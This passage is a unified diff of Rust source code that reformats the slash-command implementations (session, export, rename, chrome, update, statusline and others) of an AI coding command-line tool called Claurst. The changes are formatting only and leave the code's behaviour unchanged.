     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         if args.trim() == "exit" {
             return CommandResult::UserMessage(
-                "[Exiting plan mode. Resuming normal execution.]".to_string()
+                "[Exiting plan mode. Resuming normal execution.]".to_string(),
             );
         }
         let task_desc = if args.is_empty() {
@@ -3441,13 +3732,20 @@ impl SlashCommand for PlanCommand {
 
 #[async_trait]
 impl SlashCommand for TasksCommand {
-    fn name(&self) -> &str { "tasks" }
-    fn aliases(&self) -> Vec<&str> { vec!["bashes"] }
-    fn description(&self) -> &str { "List and manage background tasks" }
+    fn name(&self) -> &str {
+        "tasks"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["bashes"]
+    }
+    fn description(&self) -> &str {
+        "List and manage background tasks"
+    }
 
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
         CommandResult::UserMessage(
-            "Please list all current tasks using the TaskList tool and show their status.".to_string()
+            "Please list all current tasks using the TaskList tool and show their status."
+                .to_string(),
         )
     }
 }
@@ -3456,9 +3754,15 @@ impl SlashCommand for TasksCommand {
 
 #[async_trait]
 impl SlashCommand for SessionCommand {
-    fn name(&self) -> &str { "session" }
-    fn aliases(&self) -> Vec<&str> { vec!["remote"] }
-    fn description(&self) -> &str { "Show or manage conversation sessions" }
+    fn name(&self) -> &str {
+        "session"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["remote"]
+    }
+    fn description(&self) -> &str {
+        "Show or manage conversation sessions"
+    }
 
     async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult {
         match args.trim() {
@@ -3522,7 +3826,11 @@ impl SlashCommand for SessionCommand {
                         for sess in sessions.iter().take(5) {
                             let updated = sess.updated_at.format("%Y-%m-%d %H:%M").to_string();
                             let id_short = &sess.id[..sess.id.len().min(8)];
-                            let marker = if sess.id == ctx.session_id { " ◀ current" } else { "" };
+                            let marker = if sess.id == ctx.session_id {
+                                " ◀ current"
+                            } else {
+                                ""
+                            };
                             output.push_str(&format!(
                                 "  {} | {} | {} messages | {}{}\n",
                                 id_short,
@@ -3532,13 +3840,18 @@ impl SlashCommand for SessionCommand {
                                 marker,
                             ));
                         }
-                        output.push_str("\nUse /session list for all sessions, /resume <id> to switch.");
+                        output.push_str(
+                            "\nUse /session list for all sessions, /resume <id> to switch.",
+                        );
                     }
 
                     CommandResult::Message(output)
                 }
             }
-            _ => CommandResult::Error(format!("Unknown subcommand: {}\n\nUsage: /session [list]", args)),
+            _ => CommandResult::Error(format!(
+                "Unknown subcommand: {}\n\nUsage: /session [list]",
+                args
+            )),
         }
     }
 }
@@ -3547,8 +3860,12 @@ impl SlashCommand for SessionCommand {
 
 #[async_trait]
 impl SlashCommand for ForkCommand {
-    fn name(&self) -> &str { "fork" }
-    fn description(&self) -> &str { "Fork the current session into a new branch" }
+    fn name(&self) -> &str {
+        "fork"
+    }
+    fn description(&self) -> &str {
+        "Fork the current session into a new branch"
+    }
     fn help(&self) -> &str {
         "Usage: /fork [message_index]\n\n\
          Fork the current session at the specified message index (or at the\n\
@@ -3575,9 +3892,7 @@ impl SlashCommand for ForkCommand {
             "Fork of {}",
             ctx.session_title.as_deref().unwrap_or("session")
         ));
-        new_session.working_dir = Some(
-            ctx.working_dir.to_string_lossy().to_string(),
-        );
+        new_session.working_dir = Some(ctx.working_dir.to_string_lossy().to_string());
 
         let new_id = new_session.id.clone();
         match claurst_core::history::save_session(&new_session).await {
@@ -3594,9 +3909,15 @@ impl SlashCommand for ForkCommand {
 
 #[async_trait]
 impl SlashCommand for ThinkingCommand {
-    fn name(&self) -> &str { "thinking" }
-    fn description(&self) -> &str { "Toggle extended thinking mode" }
-    fn aliases(&self) -> Vec<&str> { vec!["think"] }
+    fn name(&self) -> &str {
+        "thinking"
+    }
+    fn description(&self) -> &str {
+        "Toggle extended thinking mode"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["think"]
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         // Extended thinking is configured through the model; just inform the user
@@ -3604,7 +3925,8 @@ impl SlashCommand for ThinkingCommand {
         if model.contains("claude-3-5") || model.contains("claude-3.5") {
             CommandResult::Message(
                 "Extended thinking is not available for Claude 3.5 models.\n\
-                 Use claude-opus-4-6 or claude-sonnet-4-6 for extended thinking.".to_string()
+                 Use claude-opus-4-6 or claude-sonnet-4-6 for extended thinking."
+                    .to_string(),
             )
         } else {
             CommandResult::Message(format!(
@@ -3683,7 +4005,12 @@ fn export_message_to_markdown(
                 'search: for next_msg in all_messages.iter().skip(msg_idx + 1) {
                     if let MessageContent::Blocks(next_blocks) = &next_msg.content {
                         for nb in next_blocks {
-                            if let ContentBlock::ToolResult { tool_use_id, content, is_error } = nb {
+                            if let ContentBlock::ToolResult {
+                                tool_use_id,
+                                content,
+                                is_error,
+                            } = nb
+                            {
                                 if tool_use_id.as_str() == *tool_id {
                                     let text = match content {
                                         ToolResultContent::Text(t) => t.clone(),
@@ -3699,17 +4026,27 @@ fn export_message_to_markdown(
                                             .collect::<Vec<_>>()
                                             .join(""),
                                     };
-                                    let label = if is_error.unwrap_or(false) { "Error" } else { "Output" };
-                                    found_output = Some(format!("**{}:** `{}`\n",
+                                    let label = if is_error.unwrap_or(false) {
+                                        "Error"
+                                    } else {
+                                        "Output"
+                                    };
+                                    found_output = Some(format!(
+                                        "**{}:** `{}`\n",
                                         label,
-                                        text.lines().next().unwrap_or(&text).trim()));
+                                        text.lines().next().unwrap_or(&text).trim()
+                                    ));
                                     break 'search;
                                 }
                             }
                         }
                     }
                 }
-                out.push_str(found_output.as_deref().unwrap_or("**Output:** *(pending)*\n"));
+                out.push_str(
+                    found_output
+                        .as_deref()
+                        .unwrap_or("**Output:** *(pending)*\n"),
+                );
             }
         }
     }
@@ -3723,7 +4060,10 @@ fn build_markdown_export(ctx: &CommandContext) -> String {
     out.push_str("# Conversation Export\n\n");
     out.push_str(&format!("- **Session ID:** {}\n", ctx.session_id));
     out.push_str(&format!("- **Model:** {}\n", ctx.config.effective_model()));
-    out.push_str(&format!("- **Exported:** {}\n", chrono::Utc::now().to_rfc3339()));
+    out.push_str(&format!(
+        "- **Exported:** {}\n",
+        chrono::Utc::now().to_rfc3339()
+    ));
     if let Some(ref title) = ctx.session_title {
         out.push_str(&format!("- **Title:** {}\n", title));
     }
@@ -3758,8 +4098,12 @@ fn build_json_export(ctx: &CommandContext) -> serde_json::Value {
 
 #[async_trait]
 impl SlashCommand for ExportCommand {
-    fn name(&self) -> &str { "export" }
-    fn description(&self) -> &str { "Export conversation to markdown or JSON" }
+    fn name(&self) -> &str {
+        "export"
+    }
+    fn description(&self) -> &str {
+        "Export conversation to markdown or JSON"
+    }
     fn help(&self) -> &str {
         "Usage: /export [--format markdown|json] [--output <file>]\n\n\
          Export the current conversation.\n\n\
@@ -3791,7 +4135,7 @@ impl SlashCommand for ExportCommand {
                         i += 2;
                     } else {
                         return CommandResult::Error(
-                            "--format requires a value: markdown or json".to_string()
+                            "--format requires a value: markdown or json".to_string(),
                         );
                     }
                 }
@@ -3800,9 +4144,7 @@ impl SlashCommand for ExportCommand {
                         output_path = Some(tokens[i + 1].to_string());
                         i += 2;
                     } else {
-                        return CommandResult::Error(
-                            "--output requires a file path".to_string()
-                        );
+                        return CommandResult::Error("--output requires a file path".to_string());
                     }
                 }
                 other if !other.starts_with('-') => {
@@ -3824,7 +4166,8 @@ impl SlashCommand for ExportCommand {
             Some("json") => "json",
             Some(other) => {
                 return CommandResult::Error(format!(
-                    "Unknown format '{}'. Use 'markdown' or 'json'.", other
+                    "Unknown format '{}'. Use 'markdown' or 'json'.",
+                    other
                 ));
             }
             None => {
@@ -3861,7 +4204,11 @@ impl SlashCommand for ExportCommand {
                     format!(
                         "{}.{}",
                         filename,
-                        if resolved_format == "markdown" { "md" } else { "json" }
+                        if resolved_format == "markdown" {
+                            "md"
+                        } else {
+                            "json"
+                        }
                     )
                 } else {
                     filename.to_string()
@@ -3880,9 +4227,9 @@ impl SlashCommand for ExportCommand {
                         ctx.messages.len(),
                         resolved_format,
                     )),
-                    Err(e) => CommandResult::Error(format!(
-                        "Failed to write {}: {}", path.display(), e
-                    )),
+                    Err(e) => {
+                        CommandResult::Error(format!("Failed to write {}: {}", path.display(), e))
+                    }
                 }
             }
             None => {
@@ -3897,9 +4244,15 @@ impl SlashCommand for ExportCommand {
 
 #[async_trait]
 impl SlashCommand for SkillsCommand {
-    fn name(&self) -> &str { "skills" }
-    fn aliases(&self) -> Vec<&str> { vec!["skill"] }
-    fn description(&self) -> &str { "List available skills in .claurst/commands/" }
+    fn name(&self) -> &str {
+        "skills"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["skill"]
+    }
+    fn description(&self) -> &str {
+        "List available skills in .claurst/commands/"
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         let mut found: Vec<String> = Vec::new();
@@ -3957,15 +4310,13 @@ impl SlashCommand for SkillsCommand {
         }
 
         // Include discovered skills from .claurst/skills/ and configured paths/URLs.
-        let discovered = claurst_core::discover_skills(
-            &ctx.working_dir,
-            &ctx.config.skills,
-        );
+        let discovered = claurst_core::discover_skills(&ctx.working_dir, &ctx.config.skills);
 
         let mut output = if found.is_empty() && discovered.is_empty() {
             return CommandResult::Message(
                 "No skills found.\nCreate .md files in .claurst/commands/ to define skills.\n\
-                 Example: .claurst/commands/review.md".to_string(),
+                 Example: .claurst/commands/review.md"
+                    .to_string(),
             );
         } else if found.is_empty() {
             String::new()
@@ -3974,7 +4325,11 @@ impl SlashCommand for SkillsCommand {
             format!(
                 "Available skills ({}):\n{}",
                 found.len(),
-                found.iter().map(|s| format!("  /{}", s)).collect::<Vec<_>>().join("\n")
+                found
+                    .iter()
+                    .map(|s| format!("  /{}", s))
+                    .collect::<Vec<_>>()
+                    .join("\n")
             )
         };
 
@@ -4005,8 +4360,12 @@ impl SlashCommand for SkillsCommand {
 
 #[async_trait]
 impl SlashCommand for RewindCommand {
-    fn name(&self) -> &str { "rewind" }
-    fn description(&self) -> &str { "Interactively select a message to rewind to" }
+    fn name(&self) -> &str {
+        "rewind"
+    }
+    fn description(&self) -> &str {
+        "Interactively select a message to rewind to"
+    }
     fn help(&self) -> &str {
         "Usage: /rewind\n\
          Opens an interactive overlay to select the message to rewind to.\n\
@@ -4015,7 +4374,9 @@ impl SlashCommand for RewindCommand {
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         if ctx.messages.is_empty() {
-            return CommandResult::Message("Nothing to rewind — conversation is empty.".to_string());
+            return CommandResult::Message(
+                "Nothing to rewind — conversation is empty.".to_string(),
+            );
         }
         CommandResult::OpenRewindOverlay
     }
@@ -4025,8 +4386,12 @@ impl SlashCommand for RewindCommand {
 
 #[async_trait]
 impl SlashCommand for StatsCommand {
-    fn name(&self) -> &str { "stats" }
-    fn description(&self) -> &str { "Show token usage and cost statistics" }
+    fn name(&self) -> &str {
+        "stats"
+    }
+    fn description(&self) -> &str {
+        "Show token usage and cost statistics"
+    }
     fn help(&self) -> &str {
         "Usage: /stats\n\n\
          Shows detailed token usage and cost breakdown for the current session,\n\
@@ -4044,15 +4409,21 @@ impl SlashCommand for StatsCommand {
         let model = ctx.config.effective_model();
 
         // Count user/assistant turns separately.
-        let user_turns = ctx.messages.iter()
+        let user_turns = ctx
+            .messages
+            .iter()
             .filter(|m| m.role == claurst_core::types::Role::User)
             .count();
-        let assistant_turns = ctx.messages.iter()
+        let assistant_turns = ctx
+            .messages
+            .iter()
             .filter(|m| m.role == claurst_core::types::Role::Assistant)
             .count();
 
         // Count tool-use invocations.
-        let tool_calls: usize = ctx.messages.iter()
+        let tool_calls: usize = ctx
+            .messages
+            .iter()
             .map(|m| m.get_tool_use_blocks().len())
             .sum();
 
@@ -4103,14 +4474,19 @@ impl SlashCommand for StatsCommand {
 
 #[async_trait]
 impl SlashCommand for FilesCommand {
-    fn name(&self) -> &str { "files" }
-    fn description(&self) -> &str { "List files referenced in the current conversation" }
+    fn name(&self) -> &str {
+        "files"
+    }
+    fn description(&self) -> &str {
+        "List files referenced in the current conversation"
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         use std::collections::HashSet;
         // Scan message content for file paths (simple heuristic)
         let mut files: HashSet<String> = HashSet::new();
-        let path_re = regex::Regex::new(r#"(?m)([A-Za-z]:[\\/][^\s,;:"'<>]+|/[^\s,;:"'<>]{3,})"#).ok();
+        let path_re =
+            regex::Regex::new(r#"(?m)([A-Za-z]:[\\/][^\s,;:"'<>]+|/[^\s,;:"'<>]{3,})"#).ok();
 
         for msg in &ctx.messages {
             let text = msg.get_all_text();
@@ -4136,7 +4512,11 @@ impl SlashCommand for FilesCommand {
         CommandResult::Message(format!(
             "Referenced files ({}):\n{}",
             sorted.len(),
-            sorted.iter().map(|f| format!("  {}", f)).collect::<Vec<_>>().join("\n")
+            sorted
+                .iter()
+                .map(|f| format!("  {}", f))
+                .collect::<Vec<_>>()
+                .join("\n")
         ))
     }
 }
@@ -4145,8 +4525,12 @@ impl SlashCommand for FilesCommand {
 
 #[async_trait]
 impl SlashCommand for RenameCommand {
-    fn name(&self) -> &str { "rename" }
-    fn description(&self) -> &str { "Rename the current session" }
+    fn name(&self) -> &str {
+        "rename"
+    }
+    fn description(&self) -> &str {
+        "Rename the current session"
+    }
     fn help(&self) -> &str {
         "Usage: /rename [new name]\n\n\
          With a name: sets the session title immediately.\n\
@@ -4178,12 +4562,18 @@ impl SlashCommand for RenameCommand {
             .take(20)
             .filter_map(|m| {
                 let text = m.get_all_text();
-                if text.is_empty() { return None; }
+                if text.is_empty() {
+                    return None;
+                }
                 let role = match m.role {
                     claurst_core::types::Role::User => "User",
                     claurst_core::types::Role::Assistant => "Assistant",
                 };
-                Some(format!("{}: {}", role, text.chars().take(300).collect::<String>()))
+                Some(format!(
+                    "{}: {}",
+                    role,
+                    text.chars().take(300).collect::<String>()
+                ))
             })
             .collect::<Vec<_>>()
             .join("\n");
@@ -4210,25 +4600,29 @@ impl SlashCommand for RenameCommand {
             Examples: fix-login-bug, add-auth-feature, refactor-api-client. \
             Respond with ONLY the name, nothing else.";
 
-        let request = claurst_api::CreateMessageRequest::builder(
-            "claude-haiku-4-5".to_string(),
-            64,
-        )
-        .system_text(system_prompt)
-        .add_message(claurst_api::ApiMessage {
-            role: "user".to_string(),
-            content: serde_json::Value::String(
-                format!("Conversation to name:\n\n{}", &excerpt[..excerpt.len().min(2000)])
-            ),
-        })
-        .build();
+        let request =
+            claurst_api::CreateMessageRequest::builder("claude-haiku-4-5".to_string(), 64)
+                .system_text(system_prompt)
+                .add_message(claurst_api::ApiMessage {
+                    role: "user".to_string(),
+                    content: serde_json::Value::String(format!(
+                        "Conversation to name:\n\n{}",
+                        &excerpt[..excerpt.len().min(2000)]
+                    )),
+                })
+                .build();
 
         match client.create_message(request).await {
             Ok(response) => {
                 // Extract text from the response content blocks.
-                let raw_text: String = response.content.iter()
+                let raw_text: String = response
+                    .content
+                    .iter()
                     .filter_map(|block| {
-                        block.get("text").and_then(|v| v.as_str()).map(str::to_string)
+                        block
+                            .get("text")
+                            .and_then(|v| v.as_str())
+                            .map(str::to_string)
                     })
                     .collect::<Vec<_>>()
                     .join("")
@@ -4246,7 +4640,8 @@ impl SlashCommand for RenameCommand {
                 if cleaned.is_empty() {
                     return CommandResult::Error(
                         "Could not generate a valid name from conversation. \
-                         Use /rename <name> to set manually.".to_string(),
+                         Use /rename <name> to set manually."
+                            .to_string(),
                     );
                 }
 
@@ -4264,8 +4659,12 @@ impl SlashCommand for RenameCommand {
 
 #[async_trait]
 impl SlashCommand for EffortCommand {
-    fn name(&self) -> &str { "effort" }
-    fn description(&self) -> &str { "Set the model's thinking effort (low | normal | high)" }
+    fn name(&self) -> &str {
+        "effort"
+    }
+    fn description(&self) -> &str {
+        "Set the model's thinking effort (low | normal | high)"
+    }
     fn help(&self) -> &str {
         "Usage: /effort [low|normal|high]\n\
          Sets how much computation the model uses for reasoning.\n\
@@ -4302,8 +4701,12 @@ impl SlashCommand for EffortCommand {
 
 #[async_trait]
 impl SlashCommand for SummaryCommand {
-    fn name(&self) -> &str { "summary" }
-    fn description(&self) -> &str { "Generate a brief summary of the conversation so far" }
+    fn name(&self) -> &str {
+        "summary"
+    }
+    fn description(&self) -> &str {
+        "Generate a brief summary of the conversation so far"
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         let count = ctx.messages.len();
@@ -4324,8 +4727,12 @@ impl SlashCommand for SummaryCommand {
 
 #[async_trait]
 impl SlashCommand for CommitCommand {
-    fn name(&self) -> &str { "commit" }
-    fn description(&self) -> &str { "Ask Claurst to commit staged changes" }
+    fn name(&self) -> &str {
+        "commit"
+    }
+    fn description(&self) -> &str {
+        "Ask Claurst to commit staged changes"
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let extra = if args.trim().is_empty() {
@@ -4352,7 +4759,7 @@ impl SlashCommand for CommitCommand {
 #[derive(Debug, Clone, serde::Serialize, serde::Deserialize, Default)]
 struct UiSettings {
     #[serde(default)]
-    pub editor_mode: Option<String>,       // "vim" or "normal"
+    pub editor_mode: Option<String>, // "vim" or "normal"
     #[serde(default)]
     pub fast_mode: Option<bool>,
     #[serde(default)]
@@ -4414,9 +4821,15 @@ where
 
 #[async_trait]
 impl SlashCommand for RemoteControlCommand {
-    fn name(&self) -> &str { "remote-control" }
-    fn aliases(&self) -> Vec<&str> { vec!["rc"] }
-    fn description(&self) -> &str { "Show or manage the remote control (Bridge) connection" }
+    fn name(&self) -> &str {
+        "remote-control"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["rc"]
+    }
+    fn description(&self) -> &str {
+        "Show or manage the remote control (Bridge) connection"
+    }
     fn help(&self) -> &str {
         "Usage: /remote-control [start|stop|status]\n\n\
          The Bridge feature lets you connect your local Claurst CLI to the\n\
@@ -4453,8 +4866,11 @@ impl SlashCommand for RemoteControlCommand {
                     "not set (required to connect)"
                 };
 
-                let startup_status =
-                    if remote_at_startup { "enabled at startup" } else { "disabled" };
+                let startup_status = if remote_at_startup {
+                    "enabled at startup"
+                } else {
+                    "disabled"
+                };
 
                 // Active session info from context
                 let session_section = if let Some(ref url) = ctx.remote_session_url {
@@ -4562,8 +4978,12 @@ impl SlashCommand for RemoteControlCommand {
 
 #[async_trait]
 impl SlashCommand for RemoteEnvCommand {
-    fn name(&self) -> &str { "remote-env" }
-    fn description(&self) -> &str { "Show and manage environment variables for remote sessions" }
+    fn name(&self) -> &str {
+        "remote-env"
+    }
+    fn description(&self) -> &str {
+        "Show and manage environment variables for remote sessions"
+    }
     fn help(&self) -> &str {
         "Usage: /remote-env [set <KEY> <VALUE> | unset <KEY> | list]\n\n\
          Manages env vars stored in config that are forwarded to remote Claurst sessions.\n\
@@ -4629,9 +5049,7 @@ impl SlashCommand for RemoteEnvCommand {
             }
             "unset" | "remove" | "delete" => {
                 if key.is_empty() {
-                    return CommandResult::Error(
-                        "Usage: /remote-env unset <KEY>".to_string(),
-                    );
+                    return CommandResult::Error("Usage: /remote-env unset <KEY>".to_string());
                 }
                 if !ctx.config.env.contains_key(key) {
                     return CommandResult::Message(format!("Key '{}' is not set.", key));
@@ -4661,8 +5079,12 @@ impl SlashCommand for RemoteEnvCommand {
 
 #[async_trait]
 impl SlashCommand for ContextCommand {
-    fn name(&self) -> &str { "context" }
-    fn description(&self) -> &str { "Show context window usage (tokens used / available)" }
+    fn name(&self) -> &str {
+        "context"
+    }
+    fn description(&self) -> &str {
+        "Show context window usage (tokens used / available)"
+    }
     fn help(&self) -> &str {
         "Usage: /context\n\n\
          Displays the current context window utilization:\n\
@@ -4728,8 +5150,12 @@ impl SlashCommand for ContextCommand {
 
 #[async_trait]
 impl SlashCommand for CopyCommand {
-    fn name(&self) -> &str { "copy" }
-    fn description(&self) -> &str { "Copy the last assistant response to the clipboard" }
+    fn name(&self) -> &str {
+        "copy"
+    }
+    fn description(&self) -> &str {
+        "Copy the last assistant response to the clipboard"
+    }
     fn help(&self) -> &str {
         "Usage: /copy [n]\n\n\
          Copies the most recent assistant response to the system clipboard.\n\
@@ -4814,6 +5240,7 @@ impl SlashCommand for CopyCommand {
 
 mod chrome_cdp {
     use base64::Engine as _;
+    use futures::{SinkExt, StreamExt};
     use once_cell::sync::Lazy;
     use parking_lot::Mutex;
     use serde_json::{json, Value};
@@ -4822,7 +5249,6 @@ mod chrome_cdp {
     use tokio_tungstenite::{
         connect_async, tungstenite::Message as WsMessage, MaybeTlsStream, WebSocketStream,
     };
-    use futures::{SinkExt, StreamExt};
 
     // -----------------------------------------------------------------------
     // Global session state
@@ -4916,9 +5342,9 @@ mod chrome_cdp {
         let ws_url = tabs
             .as_array()
             .and_then(|arr| {
-                arr.iter().find(|t| t["type"] == "page").and_then(|t| {
-                    t["webSocketDebuggerUrl"].as_str().map(|s| s.to_string())
-                })
+                arr.iter()
+                    .find(|t| t["type"] == "page")
+                    .and_then(|t| t["webSocketDebuggerUrl"].as_str().map(|s| s.to_string()))
             })
             .ok_or_else(|| {
                 anyhow::anyhow!(
@@ -4937,11 +5363,15 @@ mod chrome_cdp {
             })
             .unwrap_or_default();
 
-        let (ws, _) = connect_async(&ws_url).await.map_err(|e| {
-            anyhow::anyhow!("WebSocket connect to {} failed: {}", ws_url, e)
-        })?;
+        let (ws, _) = connect_async(&ws_url)
+            .await
+            .map_err(|e| anyhow::anyhow!("WebSocket connect to {} failed: {}", ws_url, e))?;
 
-        let mut session = ChromeSession { ws, port, tab_url: tab_url.clone() };
+        let mut session = ChromeSession {
+            ws,
+            port,
+            tab_url: tab_url.clone(),
+        };
         // Enable Page domain so captureScreenshot etc. work.
         cdp_call(&mut session.ws, "Page.enable", json!({})).await?;
         // Enable Runtime domain for eval/click/fill.
@@ -5135,14 +5565,15 @@ mod chrome_cdp {
         store_session(s);
         result
     }
-
 }
 
 // ---- SlashCommand impl -------------------------------------------------------
 
 #[async_trait]
 impl SlashCommand for ChromeCommand {
-    fn name(&self) -> &str { "chrome" }
+    fn name(&self) -> &str {
+        "chrome"
+    }
     fn description(&self) -> &str {
         "Browser automation via Chrome DevTools Protocol (CDP)"
     }
@@ -5175,10 +5606,7 @@ impl SlashCommand for ChromeCommand {
                     match p.parse() {
                         Ok(n) => n,
                         Err(_) => {
-                            return CommandResult::Error(format!(
-                                "Invalid port number: {}",
-                                p
-                            ));
+                            return CommandResult::Error(format!("Invalid port number: {}", p));
                         }
                     }
                 } else if rest.is_empty() {
@@ -5304,9 +5732,15 @@ impl SlashCommand for ChromeCommand {
 
 #[async_trait]
 impl SlashCommand for VimCommand {
-    fn name(&self) -> &str { "vim" }
-    fn aliases(&self) -> Vec<&str> { vec!["vi"] }
-    fn description(&self) -> &str { "Toggle vim keybinding mode on/off" }
+    fn name(&self) -> &str {
+        "vim"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["vi"]
+    }
+    fn description(&self) -> &str {
+        "Toggle vim keybinding mode on/off"
+    }
     fn help(&self) -> &str {
         "Usage: /vim [on|off]\n\n\
          Toggles vim keybinding mode in the REPL input.\n\
@@ -5323,7 +5757,11 @@ impl SlashCommand for VimCommand {
             "off" | "normal" => "normal",
             "" => {
                 // Toggle
-                if current_mode == "vim" { "normal" } else { "vim" }
+                if current_mode == "vim" {
+                    "normal"
+                } else {
+                    "vim"
+                }
             }
             other => {
                 return CommandResult::Error(format!(
@@ -5354,8 +5792,12 @@ impl SlashCommand for VimCommand {
 
 #[async_trait]
 impl SlashCommand for VoiceCommand {
-    fn name(&self) -> &str { "voice" }
-    fn description(&self) -> &str { "Toggle voice input mode on/off" }
+    fn name(&self) -> &str {
+        "voice"
+    }
+    fn description(&self) -> &str {
+        "Toggle voice input mode on/off"
+    }
     fn help(&self) -> &str {
         "Usage: /voice [on|off]\n\n\
          Enables or disables voice input (hold-to-talk).\n\
@@ -5403,9 +5845,15 @@ impl SlashCommand for VoiceCommand {
 
 #[async_trait]
 impl SlashCommand for UpgradeCommand {
-    fn name(&self) -> &str { "update" }
-    fn aliases(&self) -> Vec<&str> { vec!["upgrade"] }
-    fn description(&self) -> &str { "Check for updates and download the latest release" }
+    fn name(&self) -> &str {
+        "update"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["upgrade"]
+    }
+    fn description(&self) -> &str {
+        "Check for updates and download the latest release"
+    }
     fn help(&self) -> &str {
         "Usage: /update\n\n\
          Checks GitHub releases for the latest version of Claurst.\n\
@@ -5439,8 +5887,7 @@ impl SlashCommand for UpgradeCommand {
 
         match resp {
             Ok(r) if r.status().is_success() => {
-                let json: serde_json::Value =
-                    r.json().await.unwrap_or(serde_json::Value::Null);
+                let json: serde_json::Value = r.json().await.unwrap_or(serde_json::Value::Null);
 
                 let tag = json
                     .get("tag_name")
@@ -5492,8 +5939,12 @@ impl SlashCommand for UpgradeCommand {
 
 #[async_trait]
 impl SlashCommand for ReleaseNotesCommand {
-    fn name(&self) -> &str { "release-notes" }
-    fn description(&self) -> &str { "Show release notes for the current version" }
+    fn name(&self) -> &str {
+        "release-notes"
+    }
+    fn description(&self) -> &str {
+        "Show release notes for the current version"
+    }
     fn help(&self) -> &str {
         "Usage: /release-notes [version]\n\n\
          Fetches and displays release notes from GitHub.\n\
@@ -5534,8 +5985,7 @@ impl SlashCommand for ReleaseNotesCommand {
 
         match client.get(&url).send().await {
             Ok(r) if r.status().is_success() => {
-                let json: serde_json::Value =
-                    r.json().await.unwrap_or(serde_json::Value::Null);
+                let json: serde_json::Value = r.json().await.unwrap_or(serde_json::Value::Null);
 
                 let body = json
                     .get("body")
@@ -5547,10 +5997,7 @@ impl SlashCommand for ReleaseNotesCommand {
                     .and_then(|v| v.as_str())
                     .unwrap_or("unknown date");
 
-                let html_url = json
-                    .get("html_url")
-                    .and_then(|v| v.as_str())
-                    .unwrap_or("");
+                let html_url = json.get("html_url").and_then(|v| v.as_str()).unwrap_or("");
 
                 CommandResult::Message(format!(
                     "Release Notes: Claurst {tag}\n\
@@ -5582,8 +6029,12 @@ impl SlashCommand for ReleaseNotesCommand {
 
 #[async_trait]
 impl SlashCommand for RateLimitOptionsCommand {
-    fn name(&self) -> &str { "rate-limit-options" }
-    fn description(&self) -> &str { "Show rate limit tiers and current rate limit status" }
+    fn name(&self) -> &str {
+        "rate-limit-options"
+    }
+    fn description(&self) -> &str {
+        "Show rate limit tiers and current rate limit status"
+    }
     fn help(&self) -> &str {
         "Usage: /rate-limit-options\n\n\
          Displays available rate limit tiers and the current tier for your account.\n\
@@ -5599,7 +6050,11 @@ impl SlashCommand for RateLimitOptionsCommand {
                     "Account type:    {}\n\
                      Scopes:          {}",
                     sub_type,
-                    if tokens.scopes.is_empty() { "none".to_string() } else { tokens.scopes.join(", ") }
+                    if tokens.scopes.is_empty() {
+                        "none".to_string()
+                    } else {
+                        tokens.scopes.join(", ")
+                    }
                 )
             }
             None => {
@@ -5637,8 +6092,12 @@ impl SlashCommand for RateLimitOptionsCommand {
 
 #[async_trait]
 impl SlashCommand for StatuslineCommand {
-    fn name(&self) -> &str { "statusline" }
-    fn description(&self) -> &str { "Configure what is shown in the status line" }
+    fn name(&self) -> &str {
+        "statusline"
+    }
+    fn description(&self) -> &str {
+        "Configure what is shown in the status line"
+    }
     fn help(&self) -> &str {
         "Usage: /statusline [show|hide] [cost|tokens|model|time|all]\n\n\
          Controls which items appear in the TUI status bar at the bottom.\n\
@@ -5692,10 +6151,12 @@ impl SlashCommand for StatuslineCommand {
                 s.statusline_show_model = Some(show);
                 s.statusline_show_time = Some(show);
             }) {
-                Ok(_) => return CommandResult::Message(format!(
-                    "Status line: all items {}.",
-                    if show { "shown" } else { "hidden" }
-                )),
+                Ok(_) => {
+                    return CommandResult::Message(format!(
+                        "Status line: all items {}.",
+                        if show { "shown" } else { "hidden" }
+                    ))
+                }
                 Err(e) => return CommandResult::Error(format!("Failed to save: {}", e)),
             }
         }
@@ -5725,15 +6186,23 @@ impl SlashCommand for StatuslineCommand {
 }
 
 fn fmt_bool(v: bool) -> &'static str {
-    if v { "on" } else { "off" }
+    if v {
+        "on"
+    } else {
+        "off"
+    }
 }
 
 // ---- /security-review ----------------------------------------------------
 
 #[async_trait]
 impl SlashCommand for SecurityReviewCommand {
-    fn name(&self) -> &str { "security-review" }
-    fn description(&self) -> &str { "Run a security review of the current project" }
+    fn name(&self) -> &str {
+        "security-review"
+    }
+    fn description(&self) -> &str {
+        "Run a security review of the current project"
+    }
     fn help(&self) -> &str {
         "Usage: /security-review [path]\n\n\
          Asks Claurst to perform a security review of the codebase.\n\
@@ -5777,8 +6246,12 @@ impl SlashCommand for SecurityReviewCommand {
 
 #[async_trait]
 impl SlashCommand for TerminalSetupCommand {
-    fn name(&self) -> &str { "terminal-setup" }
-    fn description(&self) -> &str { "Help configure your terminal for optimal Claurst use" }
+    fn name(&self) -> &str {
+        "terminal-setup"
+    }
+    fn description(&self) -> &str {
+        "Help configure your terminal for optimal Claurst use"
+    }
     fn help(&self) -> &str {
         "Usage: /terminal-setup\n\n\
          Diagnoses your terminal environment and gives recommendations for\n\
@@ -5816,10 +6289,15 @@ impl SlashCommand for TerminalSetupCommand {
         // Check if UNICODE is likely supported
         let lang = std::env::var("LANG").unwrap_or_default();
         let lc_all = std::env::var("LC_ALL").unwrap_or_default();
-        let unicode_env = lang.to_lowercase().contains("utf") || lc_all.to_lowercase().contains("utf");
+        let unicode_env =
+            lang.to_lowercase().contains("utf") || lc_all.to_lowercase().contains("utf");
         checks.push(format!(
             "Unicode/UTF-8: {}",
